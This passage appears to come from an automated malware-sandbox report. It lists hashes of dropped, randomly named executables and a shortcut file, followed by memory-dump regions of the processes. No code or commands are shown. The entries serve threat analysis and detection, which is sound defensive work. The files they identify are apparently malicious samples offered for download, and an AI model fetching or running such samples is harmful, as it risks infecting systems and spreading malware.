9a5a0bed2212f47071ad27b28fe407746ecfad18

SHA256
51ac8ea2c6cab10489188133a109aa4507b76ea459996173d0679d542780387c

SHA512
a9d59f137e8688bcee3f1fdc327b41b7f8d836c8e4753e1e9887e03a7c97ecfb851e9d88460f1003970fbaf8638eaa7dd94eb5875a30f51b2c2e7a20a1b51e33

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk
MD5
af862f0524365734b7e5e3b13ec4e496

SHA1
d2a4ec466643e65d59a538fa38ff18559d7f9fee

SHA256
4aec6fd96df794f671584ac9ddd8172dbf3b4b37231cf8fac33fc6ec78286d4c

SHA512
95276d63b83e6d0ccebebb2b639ae5323caf8905f49e0ae6cf6a091fdd83e5878fbfbdfde01714d638c4432efe8923ec127f35335474a87d072e63d0631daf1e

Download Submit
C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe
MD5
30b667a8243c02b44c222367f8a27bda

SHA1
901bd0ef37e1fde147775eec6031b2f958ea412a

SHA256
46ab8bd2bab5322ecf582f65af2a88182a3d2eb90130f8f8790247c12cf7ee02

SHA512
da8d640bb99f1a10355330fb8f8cb3bc0bd61bb9adc0fdc4d863fdc4ccfdac8446462719725dcaf3435b1097ab51dda1e4bf5fa2a99a17fbbb9cce758cf56d72

Download Submit
C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe
MD5
ab257d8f1d6ea3dd53151250ea80e435

SHA1
6b72721ae4c76e6d2f3323dc50a38a36f83a3546

SHA256
036f99c2d1ac8466bdad0ae578feb24b8ae2ea68e70a97106d85e4e3871ccf6c

SHA512
3027461d6eeec0d02a93cf6ef1a68ea187a5b0bfd96ab267c00eeabd828011a73915f40b606e9fae4d3cce4cac8bd428782d70408f2a5d2cb42b8287b4a62faf

Download Submit
C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe
MD5
ab257d8f1d6ea3dd53151250ea80e435

SHA1
6b72721ae4c76e6d2f3323dc50a38a36f83a3546

SHA256
036f99c2d1ac8466bdad0ae578feb24b8ae2ea68e70a97106d85e4e3871ccf6c

SHA512
3027461d6eeec0d02a93cf6ef1a68ea187a5b0bfd96ab267c00eeabd828011a73915f40b606e9fae4d3cce4cac8bd428782d70408f2a5d2cb42b8287b4a62faf

Download Submit
C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe
MD5
042ca64cd53c293dbaf62fb2e7fec7d8

SHA1
2bebcd198f464eb52b110e57c26bb2ead09dcc01

SHA256
bc793c49510f507da1e28c886af7ee596e5eb341a242125f56d46bc7925f88f2

SHA512
f73c53cf8cec7f7c049e99b523204bee1c2a467b629e56a0f21a76e2982489db8285b9805ba6e6c1710ddc7b784a04fdeaf9a147906fe399a299202a067cca65

Download Submit
C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe
MD5
042ca64cd53c293dbaf62fb2e7fec7d8

SHA1
2bebcd198f464eb52b110e57c26bb2ead09dcc01

SHA256
bc793c49510f507da1e28c886af7ee596e5eb341a242125f56d46bc7925f88f2

SHA512
f73c53cf8cec7f7c049e99b523204bee1c2a467b629e56a0f21a76e2982489db8285b9805ba6e6c1710ddc7b784a04fdeaf9a147906fe399a299202a067cca65

Download Submit
C:\Users\Admin\Documents\VqpRmeW35ZNTRZEr_XdyQtZF.exe
MD5
0c7f3c46cf2065bf2154ee76b4f74066

SHA1
68a3df7ced7f836943a3f8943eb07640c9481754

SHA256
dc08bfe540c703b7bc5cb7784b24c69cfb5e230fa033ea7c19649ce49af72a1d

SHA512
44e2ebdda3ed3d9fdd09078fc2f903cd13a497b49bd45da0498cd554a2896eed67b39e4ceb10e75e37528f15f91beedc9a2d21a9aa0aefc16ec311ddb2958efc

Download Submit
C:\Users\Admin\Documents\ZJdaWucTUPWvvHp7cyQhgO6f.exe
MD5
74ea336f11c748f8364631c4c4dc78c8

SHA1
803e64ce366effef0e99678b9bc44d471875273f

SHA256
c9b4623e850dd811d2f596a947c23f7f1896db1d55bd2a3321a8596329c981a8

SHA512
754f8108997cebffd74994219a97873e97ffec373205fb4b70aa1915801d76f054fe471b2bdd6f1f8aedd873145c61e93a90d0c8f49beef85da121939cee0a6f

Download Submit
C:\Users\Admin\Documents\ZLQHmcinqrtmxG29JeWHldZs.exe
MD5
f625f97e0bc66bece1c0fc6dd4277f73

SHA1
311eb75ae5db1f700954f606bfe7edae6b4cff5e

SHA256
c0e844159ad8ec1e6a6edd94f5da2d5be41ee01a16400c024024d212f3f99584

SHA512
1d070b00cc1f84f5044408a975f23fdd9d338de634ab738346335e15da997b570233560274ebf698f5c0f8c7269880b45b3aff6f241fb3c5b35662609116e3a1

Download Submit
C:\Users\Admin\Documents\ZLQHmcinqrtmxG29JeWHldZs.exe
MD5
f625f97e0bc66bece1c0fc6dd4277f73

SHA1
311eb75ae5db1f700954f606bfe7edae6b4cff5e

SHA256
c0e844159ad8ec1e6a6edd94f5da2d5be41ee01a16400c024024d212f3f99584

SHA512
1d070b00cc1f84f5044408a975f23fdd9d338de634ab738346335e15da997b570233560274ebf698f5c0f8c7269880b45b3aff6f241fb3c5b35662609116e3a1

Download Submit
C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe
MD5
b27975deaff012c51e0d8e69303e790a

SHA1
e6b2cd01132eec881d0b1005190030d349ed81d9

SHA256
6d1dc07584f0a97fb2f4f57ef4773ef98991361887629144767d3da01a53bd74

SHA512
d4f9e7ca4f4ace48b67baba5cd8bafbc01185b14d0e38c15f8485984b8f55b022b93a1952cd73a8df7d5a2d88aa1e5c75f2deef0b10cc8b7f8f3124f01845e56

Download Submit
C:\Users\Admin\Documents\dzAnISXyBAB9TJgfQpiJNqgn.exe
MD5
86f6bb10651a4bb77302e779eb1359de

SHA1
e924e660f34202beb56c2045e44dfd19aec4f0e3

SHA256
d2c52bc9e809b220bb23b809943a7343d06f0c124a0e09b2fc2544d4e5480d5c

SHA512
7efb62ee1ce8d09f3ca5dc4807ed9614102b159c630c91fb0f49dd482b7097bea9e461c52ebdd0b31c0675a46a3f47a454f68dab19ee94a2ca102cdc1ab94eab

Download Submit
C:\Users\Admin\Documents\dzAnISXyBAB9TJgfQpiJNqgn.exe
MD5
86f6bb10651a4bb77302e779eb1359de

SHA1
e924e660f34202beb56c2045e44dfd19aec4f0e3

SHA256
d2c52bc9e809b220bb23b809943a7343d06f0c124a0e09b2fc2544d4e5480d5c

SHA512
7efb62ee1ce8d09f3ca5dc4807ed9614102b159c630c91fb0f49dd482b7097bea9e461c52ebdd0b31c0675a46a3f47a454f68dab19ee94a2ca102cdc1ab94eab

Download Submit
C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe
MD5
4476a41754e4a2b45d6364ae950d6567

SHA1
3db4a0fae8ddd04de31a5ab37f1c5ba3ac0f899a

SHA256
59d1f78cb9b82778940b16e8d7fbdc6cbb981c147cb4e8c12387f4b6fcbc73db

SHA512
a4a4cd253c534232fb8e435fdfbbccee3ff2157314d27afeb9822670f7bceb6dfb56d5865b14f425ab66655fb6e63ab8970800ad7d20ac2da1629ed9a68301f8

Download Submit
C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe
MD5
4476a41754e4a2b45d6364ae950d6567

SHA1
3db4a0fae8ddd04de31a5ab37f1c5ba3ac0f899a

SHA256
59d1f78cb9b82778940b16e8d7fbdc6cbb981c147cb4e8c12387f4b6fcbc73db

SHA512
a4a4cd253c534232fb8e435fdfbbccee3ff2157314d27afeb9822670f7bceb6dfb56d5865b14f425ab66655fb6e63ab8970800ad7d20ac2da1629ed9a68301f8

Download Submit
C:\Users\Admin\Documents\sJhVl0NkN0zJV8udxG08WE7g.exe
MD5
30a9ddd5aa9d4760764fba2b07b264e0

SHA1
e267335c26f88da4d6c564201164bb3c6dd372ec

SHA256
469b33819e955cb6e16b644c75c310b697fb40325fa828c4a908da7aa6a247e8

SHA512
3ab62ff4b9fb751e2c377ed167497127fec7e1f13712f39d3844e466770fd83a5ffedbf60d29d4af9d22c54889d5705e30fcfc28808737dbbbdcb7fa67c03b2e

Download Submit
C:\Users\Admin\Documents\sJhVl0NkN0zJV8udxG08WE7g.exe
MD5
30a9ddd5aa9d4760764fba2b07b264e0

SHA1
e267335c26f88da4d6c564201164bb3c6dd372ec

SHA256
469b33819e955cb6e16b644c75c310b697fb40325fa828c4a908da7aa6a247e8

SHA512
3ab62ff4b9fb751e2c377ed167497127fec7e1f13712f39d3844e466770fd83a5ffedbf60d29d4af9d22c54889d5705e30fcfc28808737dbbbdcb7fa67c03b2e

Download Submit
C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe
MD5
5d7a12165295dc36952871511dca661f

SHA1
93fc0fd84292f4554063682178e2986aa14f28db

SHA256
692c58f7968448bf4940fc8ec41481a37e6684818323af504adbc117a6bc9a24

SHA512
5f6eb44593135d2ae84f984367379b999ca9a73aef05a7cae5af6ca0a65c4e448735733cabea513f5373fc16df2d733bffcc58d1002807dad4d098d0fe4021ba

Download Submit
C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe
MD5
5d7a12165295dc36952871511dca661f

SHA1
93fc0fd84292f4554063682178e2986aa14f28db

SHA256
692c58f7968448bf4940fc8ec41481a37e6684818323af504adbc117a6bc9a24

SHA512
5f6eb44593135d2ae84f984367379b999ca9a73aef05a7cae5af6ca0a65c4e448735733cabea513f5373fc16df2d733bffcc58d1002807dad4d098d0fe4021ba

Download Submit
\??\pipe\LOCAL\crashpad_2256_ICDZVRQAGKPMRGSP
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/444-138-0x00000000009D0000-0x0000000000A00000-memory.dmp

Filesize
192KB

Download
memory/444-154-0x0000000001180000-0x0000000001182000-memory.dmp

Filesize
8KB

Download
memory/444-146-0x00007FFE88F40000-0x00007FFE89A01000-memory.dmp

Filesize
10.8MB

Download
memory/480-404-0x00000000031E9000-0x0000000003255000-memory.dmp

Filesize
432KB

Download
memory/1572-418-0x0000000002160000-0x00000000021C0000-memory.dmp

Filesize
384KB

Download
memory/1684-190-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/1684-189-0x0000000000490000-0x0000000000499000-memory.dmp

Filesize
36KB

Download
memory/1684-188-0x00000000004B9000-0x00000000004C9000-memory.dmp

Filesize
64KB

Download
memory/1684-176-0x00000000004B9000-0x00000000004C9000-memory.dmp

Filesize
64KB

Download
memory/2452-376-0x0000000002120000-0x0000000002180000-memory.dmp

Filesize
384KB

Download
memory/3032-195-0x000000000A1B0000-0x000000000A1C5000-memory.dmp

Filesize
84KB

Download
memory/3076-407-0x0000000002120000-0x0000000002180000-memory.dmp

Filesize
384KB

Download
memory/3284-435-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/3284-408-0x0000000000C70000-0x0000000000E93000-memory.dmp

Filesize
2.1MB

Download
memory/3284-392-0x0000000000B70000-0x0000000000B71000-memory.dmp

Filesize
4KB

Download
memory/3284-389-0x0000000000C70000-0x0000000000E93000-memory.dmp

Filesize
2.1MB

Download
memory/3284-432-0x0000000000C70000-0x0000000000E93000-memory.dmp

Filesize
2.1MB

Download
memory/3284-394-0x0000000000C20000-0x0000000000C66000-memory.dmp

Filesize
280KB

Download
memory/3284-438-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/3284-425-0x0000000005100000-0x0000000005718000-memory.dmp

Filesize
6.1MB

Download
memory/3284-400-0x0000000077690000-0x00000000778A5000-memory.dmp

Filesize
2.1MB

Download
memory/3284-405-0x0000000000C70000-0x0000000000E93000-memory.dmp

Filesize
2.1MB

Download
memory/3340-374-0x0000000002B80000-0x0000000002BC6000-memory.dmp

Filesize
280KB

Download
memory/3340-397-0x00000000766A0000-0x0000000076C53000-memory.dmp

Filesize
5.7MB

Download
memory/3340-373-0x0000000001170000-0x0000000001171000-memory.dmp

Filesize
4KB

Download
memory/3340-412-0x00000000058B0000-0x00000000059BA000-memory.dmp

Filesize
1.0MB

Download
memory/3340-370-0x0000000000140000-0x0000000000361000-memory.dmp

Filesize
2.1MB

Download
memory/3340-423-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

Filesize
4KB

Download
memory/3340-390-0x0000000000140000-0x0000000000361000-memory.dmp

Filesize
2.1MB

Download
memory/3340-386-0x0000000077690000-0x00000000778A5000-memory.dmp

Filesize
2.1MB

Download
memory/3340-377-0x0000000000140000-0x0000000000361000-memory.dmp

Filesize
2.1MB

Download
memory/3340-393-0x0000000073FC0000-0x0000000074049000-memory.dmp

Filesize
548KB

Download
memory/3340-431-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/3372-430-0x0000000000400000-0x0000000000492000-memory.dmp

Filesize
584KB

Download
memory/3372-395-0x0000000000830000-0x0000000000857000-memory.dmp

Filesize
156KB

Download
memory/3372-420-0x0000000002120000-0x0000000002164000-memory.dmp

Filesize
272KB

Download
memory/4072-213-0x00000000041C0000-0x00000000041C8000-memory.dmp

Filesize
32KB

Download
memory/4072-202-0x00000000036F0000-0x0000000003700000-memory.dmp

Filesize
64KB

Download
memory/4072-208-0x00000000041A0000-0x00000000041A8000-memory.dmp

Filesize
32KB

Download
memory/4072-209-0x00000000041C0000-0x00000000041C8000-memory.dmp

Filesize
32KB

Download
memory/4072-210-0x0000000004260000-0x0000000004268000-memory.dmp

Filesize
32KB

Download
memory/4072-211-0x00000000043B0000-0x00000000043B8000-memory.dmp

Filesize
32KB

Download
memory/4072-196-0x0000000003550000-0x0000000003560000-memory.dmp

Filesize
64KB

Download
memory/4072-144-0x0000000000400000-0x0000000000664000-memory.dmp

Filesize
2.4MB

Download
memory/4072-214-0x00000000041C0000-0x00000000041C8000-memory.dmp

Filesize
32KB

Download
memory/4072-212-0x0000000004510000-0x0000000004518000-memory.dmp

Filesize
32KB

Download
memory/4160-158-0x00007FFEA8400000-0x00007FFEA8401000-memory.dmp

Filesize
4KB

Download
memory/4268-177-0x000000000076A000-0x0000000000786000-memory.dmp

Filesize
112KB

Download
memory/4268-179-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4268-178-0x00000000005B0000-0x00000000005E0000-memory.dmp

Filesize
192KB

Download
memory/4268-157-0x000000000076A000-0x0000000000786000-memory.dmp

Filesize
112KB

Download
memory/4340-406-0x0000000005CC0000-0x00000000062D8000-memory.dmp

Filesize
6.1MB

Download
memory/4340-416-0x00000000057C0000-0x00000000057FC000-memory.dmp

Filesize
240KB

Download
memory/4340-409-0x0000000005760000-0x0000000005772000-memory.dmp

Filesize
72KB

Download
memory/4340-427-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/4340-388-0x0000000000F10000-0x0000000000F30000-memory.dmp

Filesize
128KB

Download
memory/4340-417-0x00000000056A0000-0x0000000005CB8000-memory.dmp

Filesize
6.1MB

Download
memory/5060-421-0x00000000051B0000-0x0000000005754000-memory.dmp

Filesize
5.6MB

Download
memory/5060-387-0x00000000002B0000-0x0000000000302000-memory.dmp

Filesize
328KB

Download
memory/5060-428-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/5060-391-0x0000000004B80000-0x0000000004BF6000-memory.dmp

Filesize
472KB

Download
memory/5060-396-0x00000000025E0000-0x00000000025FE000-memory.dmp

Filesize
120KB

Download
memory/5060-433-0x0000000004B00000-0x0000000004B76000-memory.dmp

Filesize
472KB

Download
memory/5212-429-0x0000000002100000-0x0000000002160000-memory.dmp

Filesize
384KB

Download
memory/5236-403-0x00007FFEA6A50000-0x00007FFEA6D19000-memory.dmp

Filesize
2.8MB

Download
memory/5236-436-0x00007FFEA6A50000-0x00007FFEA6D19000-memory.dmp

Filesize
2.8MB

Download
memory/5236-398-0x00007FFEA8340000-0x00007FFEA83FE000-memory.dmp

Filesize
760KB

Download
memory/5236-444-0x0000028325260000-0x0000028325272000-memory.dmp

Filesize
72KB

Download
memory/5236-441-0x0000028326D20000-0x0000028326E2A000-memory.dmp

Filesize
1.0MB

Download
memory/5236-410-0x00007FFEA6A50000-0x00007FFEA6D19000-memory.dmp

Filesize
2.8MB

Download
memory/5236-414-0x00007FF6F6320000-0x00007FF6F68CE000-memory.dmp

Filesize
5.7MB

Download
memory/5236-413-0x00007FFE80030000-0x00007FFE80031000-memory.dmp

Filesize
4KB

Download
memory/5236-419-0x00007FF6F6320000-0x00007FF6F68CE000-memory.dmp

Filesize
5.7MB

Download
memory/5236-446-0x0000028326C50000-0x0000028326C8C000-memory.dmp

Filesize
240KB

Download
memory/5236-422-0x0000028325290000-0x0000028325292000-memory.dmp

Filesize
8KB

Download
memory/5408-401-0x0000000000F40000-0x0000000000F58000-memory.dmp

Filesize
96KB

Download
memory/5408-434-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/5916-439-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/5916-443-0x0000000002920000-0x0000000002930000-memory.dmp

Filesize
64KB

Download
memory/5916-437-0x0000000002980000-0x00000000029B6000-memory.dmp

Filesize
216KB

Download
memory/5916-445-0x0000000002920000-0x0000000002930000-memory.dmp

Filesize
64KB

Download
memory/5976-442-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download
memory/5976-449-0x00000000046D0000-0x00000000046D1000-memory.dmp

Filesize
4KB

Download
memory/5976-440-0x0000000004D10000-0x0000000005338000-memory.dmp

Filesize
6.2MB

Download
memory/6028-448-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/6028-447-0x00000000724E0000-0x0000000072C90000-memory.dmp

Filesize
7.7MB

Download